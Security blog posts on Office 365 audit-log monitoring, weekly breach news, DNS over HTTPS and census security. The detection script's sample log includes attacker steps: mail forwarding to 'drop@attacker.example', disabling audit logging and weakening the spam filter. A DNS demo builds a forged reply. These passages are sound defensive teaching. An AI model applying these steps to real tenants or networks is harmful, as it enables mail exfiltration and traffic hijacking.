Best Practices for Office 365 Monitoring

Logging, monitoring and alerting are probably the single biggest weakness that most organizations have.

Office 365 is also likely your single biggest exposure, since it holds the mail, files and identities an attacker is after.

So what actions should you be monitoring in Office?

According to AT&T’s AlienVault division, here is the answer.

  1. User access – who is there normally; what is your user baseline?  Are you seeing more failed logins than normal, or logins from places a user never logs in from?
  2. Administrator actions – a hacker will likely try to become an administrator, assuming the account they hacked doesn’t belong to an administrator already.  Any change in the pattern of admin activity could be a warning sign.
  3. Changes to Office policies – if the attacker wants to get away with something that would normally not be allowed, they will change the policy to let them do it.
  4. Current threat intelligence – use your threat intel sources such as the FBI, Secret Service, public alert feeds and others to tweak what you are alerting on based on attacks that the industry is currently seeing.

What are the details (see the link for even more detail)?

  • Logins – both success and failures including time and location
  • New users, deleted users, permission changes
  • Changes to logging rules
  • Access – to SharePoint, OneDrive and other resources
  • Changes to SharePoint and OneDrive permissions
  • Changes to Office 365 policies, including spam, DLP and other policies that might allow an attacker to get data out or malware in
  • Contact with known malicious IPs (see indicators of compromise from various alerts)
  • File uploads of file types known to be used in ransomware attacks, and unusual file movement that could indicate exfiltration of data
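
To show what those bullets look like as actual detection logic, here is an added example (mine, not AlienVault’s guidance and not a Microsoft tool) in Python. It runs the four categories above over audit records in the shape of the Office 365 Management Activity API, which is also what Search-UnifiedAuditLog in Exchange Online PowerShell returns. The sample log is constructed (one tenant, one attacker working from 198.51.100.7 as “bob”); the operation names are the ones Microsoft uses for these events, while the thresholds, baseline IPs, IOC list and file-extension list are assumptions you would tune for your tenant.

```python
# Triage rules for Office 365 Unified Audit Log records.
# Added example, not part of the AlienVault guidance and not a Microsoft tool.
# Record fields follow the Office 365 Management Activity API schema
# (CreationTime, Operation, UserId, ClientIP, Workload, Parameters, ...),
# which is also what Search-UnifiedAuditLog returns. The log below is
# constructed; thresholds, baseline IPs, IOC list and extension list are assumptions.
from collections import defaultdict
from datetime import datetime, timedelta
import json

FAILED_LOGIN_THRESHOLD = 5                    # assumption: this many failures per user ...
FAILED_LOGIN_WINDOW = timedelta(minutes=10)   # ... inside this window trip an alert
BASELINE_IPS = {                              # constructed: where each user normally logs in from
    "alice@example.com": {"203.0.113.10"},
    "bob@example.com": {"203.0.113.10"},
}
THREAT_INTEL_IPS = {"198.51.100.7"}           # constructed: addresses from your current IOC feeds
SUSPICIOUS_EXTENSIONS = {"exe", "js", "hta", "iso", "vbs"}   # assumed list of malware stagers
POLICY_OPERATIONS = ("Set-HostedContentFilterPolicy", "Set-DlpCompliancePolicy",
                     "Remove-DlpCompliancePolicy", "New-TransportRule", "Set-TransportRule")
LOGGING_OPERATIONS = ("Set-AdminAuditLogConfig", "Set-MailboxAuditBypassAssociation")

# Constructed sample: one tenant, one attacker working from 198.51.100.7 as "bob".
SAMPLE_LOG = json.loads("""[
{"CreationTime":"2019-09-03T08:00:05","Operation":"UserLoggedIn","UserId":"alice@example.com","ClientIP":"203.0.113.10","Workload":"AzureActiveDirectory"},
{"CreationTime":"2019-09-03T08:01:00","Operation":"UserLoginFailed","UserId":"bob@example.com","ClientIP":"198.51.100.7","Workload":"AzureActiveDirectory"},
{"CreationTime":"2019-09-03T08:01:20","Operation":"UserLoginFailed","UserId":"bob@example.com","ClientIP":"198.51.100.7","Workload":"AzureActiveDirectory"},
{"CreationTime":"2019-09-03T08:01:40","Operation":"UserLoginFailed","UserId":"bob@example.com","ClientIP":"198.51.100.7","Workload":"AzureActiveDirectory"},
{"CreationTime":"2019-09-03T08:02:00","Operation":"UserLoginFailed","UserId":"bob@example.com","ClientIP":"198.51.100.7","Workload":"AzureActiveDirectory"},
{"CreationTime":"2019-09-03T08:02:20","Operation":"UserLoginFailed","UserId":"bob@example.com","ClientIP":"198.51.100.7","Workload":"AzureActiveDirectory"},
{"CreationTime":"2019-09-03T08:04:30","Operation":"UserLoggedIn","UserId":"bob@example.com","ClientIP":"198.51.100.7","Workload":"AzureActiveDirectory"},
{"CreationTime":"2019-09-03T08:05:00","Operation":"Add member to role.","UserId":"bob@example.com","ClientIP":"198.51.100.7","Workload":"AzureActiveDirectory","ObjectId":"bob@example.com","ModifiedProperties":[{"Name":"Role.DisplayName","NewValue":"Company Administrator","OldValue":""}]},
{"CreationTime":"2019-09-03T08:06:00","Operation":"Set-AdminAuditLogConfig","UserId":"bob@example.com","ClientIP":"198.51.100.7","Workload":"Exchange","Parameters":[{"Name":"UnifiedAuditLogIngestionEnabled","Value":"False"}]},
{"CreationTime":"2019-09-03T08:07:00","Operation":"Set-Mailbox","UserId":"bob@example.com","ClientIP":"198.51.100.7","Workload":"Exchange","Parameters":[{"Name":"Identity","Value":"alice"},{"Name":"ForwardingSmtpAddress","Value":"smtp:drop@attacker.example"}]},
{"CreationTime":"2019-09-03T08:08:00","Operation":"Set-HostedContentFilterPolicy","UserId":"bob@example.com","ClientIP":"198.51.100.7","Workload":"Exchange","Parameters":[{"Name":"Identity","Value":"Default"},{"Name":"SpamAction","Value":"AddXHeader"}]},
{"CreationTime":"2019-09-03T08:09:00","Operation":"FileUploaded","UserId":"bob@example.com","ClientIP":"198.51.100.7","Workload":"SharePoint","SourceFileName":"invoice.exe","SourceFileExtension":"exe"},
{"CreationTime":"2019-09-03T09:00:00","Operation":"FileUploaded","UserId":"alice@example.com","ClientIP":"203.0.113.10","Workload":"OneDrive","SourceFileName":"notes.docx","SourceFileExtension":"docx"}
]""")


def cmdlet_params(rec):
    """Exchange admin records carry the cmdlet arguments as Name/Value pairs."""
    return {p["Name"]: p["Value"] for p in rec.get("Parameters", [])}


def role_added(rec):
    """Azure AD role changes put the role name in ModifiedProperties."""
    return next((m["NewValue"] for m in rec.get("ModifiedProperties", [])
                 if m["Name"] == "Role.DisplayName"), "?")


def triage(records):
    """Run the four AlienVault categories over a batch of records.
    Returns (rule, user, detail) tuples in time order for a human to review."""
    alerts, failures, seen_bad = [], defaultdict(list), set()
    for rec in sorted(records, key=lambda r: r["CreationTime"]):
        op, user, ip = rec["Operation"], rec.get("UserId", "?"), rec.get("ClientIP", "")
        ts = datetime.fromisoformat(rec["CreationTime"])
        # 1. user access: failed-login bursts, and successes from outside the user's baseline
        if op == "UserLoginFailed":
            recent = [t for t in failures[user] if ts - t <= FAILED_LOGIN_WINDOW] + [ts]
            failures[user] = recent
            if len(recent) == FAILED_LOGIN_THRESHOLD:      # fire once, when the threshold is crossed
                alerts.append(("failed_login_spike", user,
                               f"{len(recent)} failures since {recent[0]:%H:%M:%S} from {ip}"))
        elif op == "UserLoggedIn" and ip not in BASELINE_IPS.get(user, set()):
            alerts.append(("login_outside_baseline", user, ip))
        # 2. administrator actions: privilege escalation is the first thing to catch
        if op == "Add member to role.":
            alerts.append(("admin_role_change", user, f"{rec.get('ObjectId')} -> {role_added(rec)}"))
        # 3. changes to policies, to logging, and to where mail goes
        if op.startswith(LOGGING_OPERATIONS):
            alerts.append(("logging_change", user, json.dumps(cmdlet_params(rec), sort_keys=True)))
        elif op.startswith(POLICY_OPERATIONS):
            alerts.append(("policy_change", user, f"{op} {cmdlet_params(rec).get('Identity', '')}".strip()))
        elif op == "Set-Mailbox" and "ForwardingSmtpAddress" in cmdlet_params(rec):
            alerts.append(("mail_forwarding", user, cmdlet_params(rec)["ForwardingSmtpAddress"]))
        # 4. threat intel: any contact from a known-bad address, reported once per user/IP pair
        if ip in THREAT_INTEL_IPS and (user, ip) not in seen_bad:
            seen_bad.add((user, ip))
            alerts.append(("known_bad_ip", user, ip))
        # SharePoint / OneDrive: uploads of file types used to stage malware
        if op == "FileUploaded" and rec.get("SourceFileExtension", "").lower() in SUSPICIOUS_EXTENSIONS:
            alerts.append(("suspicious_upload", user, rec.get("SourceFileName", "")))
    return alerts


if __name__ == "__main__":
    for rule, user, detail in triage(SAMPLE_LOG):
        print(f"{rule:24} {user:20} {detail}")
```

Run against the sample, this produces eight alerts, all on “bob” and none on “alice”, in the order an analyst would want to read them: the known-bad source address, the password-guessing burst, the successful login from outside the baseline, the role grant, the attempt to turn off audit log ingestion, the forwarding rule on someone else’s mailbox, the spam-filter change and the executable dropped into SharePoint. The logging rule deserves the highest priority of the lot: everything after it only shows up because the change was caught before it took effect.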

You do need to review the alerts you get in near real time, and that takes resources, but you should be able to train junior staff to perform first-level triage.

This is not simple and it will take resources.  However, being hacked, having a breach or dealing with a ransomware attack is not free either.

Source: AT&T AlienVault

Security News for the Week Ending September 6, 2019

Cisco: Critical Bug Allows Remote Takeover of Routers

Cisco rated this bug 10 out of 10, the maximum severity score.  For users of Cisco 4000 Series ISRs, ASR 1000 Series Aggregation Services Routers, Cloud Services Router 1000V and Integrated Services Virtual Routers, an unauthenticated attacker can gain full control of the device just by sending a malicious HTTP request.  So, yet another reminder that patching your network gear is critical.  For Cisco, that means having to purchase their maintenance agreement every year.  Source: Threatpost.

USBAnywhere – Especially Places You Don’t Want

Eclypsium announced a vulnerability in the Baseboard Management Controller (BMC) on Supermicro motherboards that allows an attacker anywhere, without authentication, to access the BMC and mount a virtual USB device, wreaking all kinds of havoc as you might imagine: stealing your data, installing malware or even disabling the server entirely.  The researchers found 14,000 servers with their BMC publicly exposed, which is a small number, but as soon as a hacker compromises a single user’s computer anywhere in the enterprise, public equals private – no difference.  Part of the problem is that almost no one knows whose motherboard is inside their server.  The only good news, if there is any, is that Supermicro has released patches, but you have to figure out if your boards are vulnerable and patch them manually.  Isn’t that exciting?  Source: The Hacker News.

Remember When we Thought iPhones Were Secure?

Apparently that myth is beginning to get a little tarnished.  In fact, Android zero days are now worth more than iPhone exploits.  Why?  Because, according to exploit broker Zerodium, iPhone exploits, mostly based on Safari and iMessage, two core parts of the iPhone, are FLOODING the market.

I don’t think that users need to panic, but I think that they need to understand that iPhones are computers running software and software has bugs.  All software has bugs.  Practice safe computing, no matter what platform you are using.  Source: Vice.

Unencrypted Passwords from Poshmark Breach For Sale on the Dark Web

When Poshmark put up an information-free notice last year saying that some user information had been hacked (it turns out it was 36 million accounts, though they didn’t say so) but that no financial information was taken, so they didn’t feel too bad about it, most people said: another day, another breach.

The 36 million accounts were for sale for $750, which means that even the hacker didn’t think they were valuable.  But now there are reports that one million of those accounts are available with the passwords cracked, likely at a much higher price.  Does this mean they are working on the other 35 million?  Who knows, but if you have a Poshmark account, you should definitely change that password, and if the password was used elsewhere, change that too.  Source: Bleeping Computer.

Researchers Claim to Have Hacked the Secure Enclave

CPU makers have created what they call a “secure enclave” as a way to protect very sensitive information in the computer.  Intel calls their feature SGX.  Researchers claim to have created an attack based on Intel’s and AMD’s assumption that only non-malicious code would run in a secure enclave.  If this all proves out, it represents a real threat and reiterates the fact that you have to keep hackers out, because once they are in, nothing is safe.  Source: Bruce Schneier.

Securing DNS

Most people don’t know what DNS is, but it is almost as old as the Internet and you use it hundreds, probably thousands, of times a day.

Every time you check for new email on your phone or browse to a web site, you are using DNS.  The Internet uses numeric addresses called IP addresses to route requests, but you use names like ESPN.Com, and DNS is what translates that name into an address such as (IPv4) or 2a03:2880:f003:c07:face:b00c::2 (IPv6).

Virtually all of your communications on the Internet these days are encrypted.  Except for DNS.  Because DNS traffic is in plain text, anyone listening on your connection can see which web sites you are visiting and, if they are malicious, answer your lookup with the address of an alternative, malicious site.

Until now.

There was an earlier experiment called DNSCrypt that encrypted your DNS traffic, but it required that you install and configure extra software.  It never gained much traction.

After that came (of course) two competing standards, one called DNS over TLS (DoT) and the other called DNS over HTTPS (DoH).  In browsers, at least, it looks like DNS over HTTPS won.

It does require that you turn it on in your browser, but beyond that, nothing is required.  That will probably change in the future to be the default.

In the UK, the Internet Services Providers’ Association nominated Mozilla as an “Internet Villain” of the year for encrypting your DNS traffic, and GCHQ (their version of the NSA) wasn’t thrilled either.  Probably a great reason to do it all by itself.

Firefox is the first to do it.  In Firefox the setting is a bit buried, but here are the steps, from a ZDNet article on how to do it.

1. Type about:preferences in the address bar.

2. Scroll down to Network Settings and click on Settings.

3. Check Enable DNS over HTTPS.

4. Click OK.

You can change the default provider, but you don’t have to.

That’s pretty simple.  That is all it takes.

Now all of your DNS requests are hidden from the network you are on and cannot be spoofed by your local coffee shop WiFi.  (The DoH provider you select still sees every name you look up, so pick one whose privacy policy you trust.)
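
To make concrete what actually changes on the wire, here is an added example (mine, not from the article and not Firefox’s code) in Python.  It builds one lookup two ways: as the plain text UDP payload classic DNS sends to port 53, showing how a sniffer reads the name straight out of it and how a forged reply only needs the ID and question copied from it, and then as the RFC 8484 GET request a DoH client sends inside TLS.  The resolver URL and the sample names are assumptions; Firefox lets you pick the provider.

```python
# What an on-path observer sees with classic DNS versus DNS over HTTPS.
# Added example, not from the article and not Firefox's code. It builds the
# same lookup two ways: the plaintext UDP payload that goes to port 53, and the
# RFC 8484 GET request a DoH client sends inside TLS. The resolver URL is an
# example value; Firefox lets you pick the provider.
import base64
import struct


def build_query(name, qtype=1, txid=0x1234):
    """Wire-format DNS query (RFC 1035): 12-byte header, QNAME labels, QTYPE, QCLASS=IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # flags: RD=1; one question
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", qtype, 1)


def name_in_query(payload):
    """The coffee-shop view: the queried name is readable straight out of the UDP payload."""
    pos, labels = 12, []
    while payload[pos] != 0:
        length = payload[pos]
        labels.append(payload[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    return ".".join(labels)


def forge_answer(query, ip, ttl=300):
    """What spoofing takes on plaintext DNS: copy the 16-bit ID and the question, both
    visible in the query, and attach an A record for any address. Over DoH the query is
    inside TLS, so there is nothing to copy and no way to inject the reply."""
    header = query[:2] + struct.pack("!HHHHH", 0x8180, 1, 1, 0, 0)   # QR=1 RD=1 RA=1, 1 answer
    question = query[12:]                                           # QNAME + QTYPE + QCLASS verbatim
    rr = (b"\xc0\x0c"                                               # name: pointer to the question
          + struct.pack("!HHIH", 1, 1, ttl, 4)                      # type A, class IN, TTL, RDLENGTH
          + bytes(int(octet) for octet in ip.split(".")))
    return header + question + rr


def parse_answer_ip(response):
    """Read the A record out of a response, the way a stub resolver would."""
    pos = 12
    while response[pos] != 0:            # skip the question name ...
        pos += 1 + response[pos]
    pos += 1 + 4                         # ... its terminator, QTYPE and QCLASS
    if response[pos] & 0xC0 == 0xC0:     # answer name given as a compression pointer
        pos += 2
    rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", response[pos:pos + 10])
    pos += 10
    return ".".join(str(b) for b in response[pos:pos + rdlen]) if rtype == 1 else None


def doh_get_url(name, resolver="https://mozilla.cloudflare-dns.com/dns-query"):
    """RFC 8484 GET form: the wire query, base64url without padding, in the `dns` parameter.
    ID 0 is used so identical questions give identical URLs (RFC 8484 section 4.1)."""
    encoded = base64.urlsafe_b64encode(build_query(name, txid=0)).rstrip(b"=").decode("ascii")
    return f"{resolver}?dns={encoded}"


def decode_doh_param(url):
    """Resolver side: restore the padding and recover the wire-format query."""
    encoded = url.rsplit("?dns=", 1)[1]
    return base64.urlsafe_b64decode(encoded + "=" * (-len(encoded) % 4))


if __name__ == "__main__":
    q = build_query("espn.com")
    print("plaintext UDP payload :", q.hex())
    print("visible to the WiFi   :", name_in_query(q))
    print("forged reply points to:", parse_answer_ip(forge_answer(q, "203.0.113.5")))
    print("DoH request           :", doh_get_url("espn.com"))
```

The point of the two views is the last line of output versus the second: the DoH URL carries exactly the same query bytes, but on the wire the whole URL is inside the TLS session to the resolver, so the coffee shop sees only that you talked to the resolver.  What DoH does not change is also worth noting: the resolver itself still sees every name, and the site name still travels in the clear in the TLS handshake to the web site (the SNI field), so this is a privacy and anti-spoofing improvement on the DNS hop, not invisibility.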

Chrome is a little behind, but it should be there in a couple of months and since Microsoft Edge is really Chrome with a different decal, it will likely show up there too.

Having someone listen in on your browsing is a problem if you care about your privacy.

Having someone redirect your browser to a malicious copy of the web site you wanted, where they steal your password or install malware, is a problem for everyone.

One more security/privacy thing that you should enable and it doesn’t cost anything.


Will Hackers Compromise the Census by Attacking Library Computers?

The U.S. Census wants people to respond online because it will save them money.  They don’t have to transfer data from paper forms and they don’t have to send census workers out.  From a pure finance standpoint, it makes perfect sense.  The census will cost us about $15 billion this time around.

And, from a typical user’s standpoint, whether the census data is right or wrong won’t change the number of dollars in their pocket, so they don’t really care whether it is correct.  That is, of course, a short term perspective.

In fairness, the Census Bureau has been working with Homeland Security to try and protect the first ever digital census, but given the government’s general cybersecurity record, that doesn’t give me a whole lot of hope.

From our adversary’s perspective, destroying normal Americans’ confidence in the Census results would be a good thing.

The Census Bureau plans on telling the 66 million Americans who do not have Internet at home to go to a local public library (that sounds like an awful concept to me, but I understand that the Census Bureau wants to save money).

Consider, however, the track record of public libraries from a cybersecurity perspective.   In 2017 hackers successfully attacked 700 public libraries from St. Louis, to Anne Arundel County, MD. to South Carolina, New York and many others.

Library budgets are being slashed across the country, so cybersecurity is probably not their top priority, even if it means that the Census results may be invalid and subject to lawsuits.

The New York Library Association said that state libraries were unprepared for the Census.

Alaska cancelled funding for Internet access at its public libraries, so many of those libraries may not even be able to allow residents to complete their Census forms online at all.

If Russia and China decide that creating more chaos would be useful to them, increasing the level of attacks on libraries could happen during the Census filing season.

The Census Bureau, following the tradition that many businesses started years ago, has eliminated or reduced testing as their software is behind schedule.  Companies have figured out that was a bad idea, but not the Census Bureau.

For me, paper seems like a much safer idea.

And don’t be surprised if we see a lot of lawsuits.  Stock up on popcorn, this could get interesting.

Source: Wired.